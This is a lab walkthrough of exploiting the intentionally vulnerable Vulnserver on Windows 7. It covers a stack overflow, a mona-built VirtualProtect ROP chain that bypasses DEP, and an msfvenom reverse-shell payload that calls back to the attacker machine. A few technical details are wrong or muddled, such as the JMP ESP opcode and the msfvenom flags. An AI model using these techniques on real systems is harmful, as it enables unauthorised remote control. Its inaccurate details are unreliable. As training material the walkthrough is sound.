Buffer Overflow - Defeating Data Execution Prevention (DEP) With Return-Oriented Programming (ROP)

In Buffer Overflow, Return Oriented Programming (ROP) can be used to defeat Data Execution Prevention (DEP). ASLR or DEP prevents code injected onto the stack from executing hence the use of tiny pieces of Windows DLL code ("Gadgets") to construct a program that turns DEP off.

Tools needed:

Basic Python scripts

Immunity Debugger

MONA plug-in for Immunity Debugger (copy it into Immunity folder)

Metasploit Framework/Kali attack machine

Windows 7 victim machine

Getting started;

On the Windows 7 machine, Turn off your fire-wall then double click the Vulnserver executable to start it and the application opens, as shown below.



Test connection to VulnServer from your Kali Machine using netcat.
nc 192.168.229.133 9999 (replace IP with your Win 7 machines IP)



Attach VulnServer to Immunity Debugger
Next, test Code Execution.

We will send an attack that puts the JMP ESP address (625011af) into the EIP which will start executing code at the location ESP points to. JMP ESP is found with MONA In Immunity. At the bottom of Immunity, execute the below command in the white bar. ffef = JMP ESP in nasm and essfunc.dll is the module with "False" in both the Rebase and ASLR columns of Mona that can be found with the command (!mona modules)

!mona find -s "\xff\xe4" -m essfunc.dll



For testing purposes, we put NOP instructions ('\x90') ie No Operation followed by a ('\xCC') INT 3 instruction which interrupts processing. If this works, the program will stop at the '\xCC' instruction.

On your Kali Linux machine, in a Terminal window, execute the below code;



The lower left corner of the Immunity window should show "INT 3 command". In upper right pane of Immunity, left-click the value to the right of ESP, so it's highlighted in blue and click "Follow in Dump". The lower left pane shows the NOP sled as a series of 90 bytes, followed by a CC byte. This works and we are able to inject code and execute it !.



Turn on DEP.

Windows 7 desktop, click Start, right click Computer, click Properties. Then click Advanced System Settings, Advanced tab, Performance section, click Settings button. In the Performance Options box, click the Data Execution Prevention then click turn on DEP.



Restart VulnServer and Immunity then run JMP ESP code again. The lower left corner of the Immunity window should say -Access violation, as shown below which means you cannot execute code on the stack as DEP is turned on.



In Return Oriented Programming (ROP), we use pieces of code with just a few machine language instructions followed by a RETN, and chain them together to turn off DEP. To turn off DEP, we can use any of the following functions: VirtuAlloc(), HeapCreate(), SetProcessDEPPolicy(), NtSetInformationProcess(), VirtualProtect(), or WriteProtectMemory().

Building a ROP Chain with MONA

In Immunity, at the bottom white bar type the below command then hit the Enter key:

!mona rop -m *.dll -cp nonull

MONA goes through all DLLs and constructs chains of useful gadgets shown in a Log data window below.

Log Data is accessed via the View tab > Log data. The output should be located on the Immunity Debugger folder> rop_chains.txt file.



The VirtualProtect() ROP Chain

In the rop_chains.txt file, we find the "Register Setup for VirtualProtect()" section, as shown in the image below. We will insert all those values into registers then JMP ESP ie loading the parameters into the stack then calling the function's address.



Inserting the Python ROP Code to the Attack:

Inside the "rop_chains.txt" file, there is a Python code for the ROP Chain to use in the attack, as shown below. Copy it then add it to the attack script.





Add the rop_chain to the attack script to replace eip as well as two libraries "struct" and "sys" to the import statement at the beginning of the attack script.



Next, make the program executable (chmod +x), restart both Vulnerable Server and Immunity then run the attack script. In the upper right pane of Immunity, click on ESP, so it's highlighted in blue then right-click and click "Follow in Dump". The lower left pane shows the NOP sled as a series of 90 bytes, followed by a CC byte. This shows that the ROP Chain turned off DEP, therefore the code we added to the stack executed.



Create the Exploit Code:

Restart Vulserver and immunity.Use Msfvenom to create the exploit code and replace the IP address with your Kali Linux IP.

msfvenom -a x64 -p Windows -p windows/x64/shell_reverse_tcp LHOST="192.168.229.130" LPORT=443 EXITFUNC=thread -b '\x00' -f python (x64 is for 64 bit platforms, x86 is for 32 bit)



Change the attack line in the code to:

padding = 'F' * (3000 - 2006 - len(rop_chain) - 16 - len(shellcode))
attack = prefix + rop_chain + nopsled + shellcode + padding

Make the program executable, start a nc Listener and run the script and you now have control of Vulnserver in the Windows 7 machine.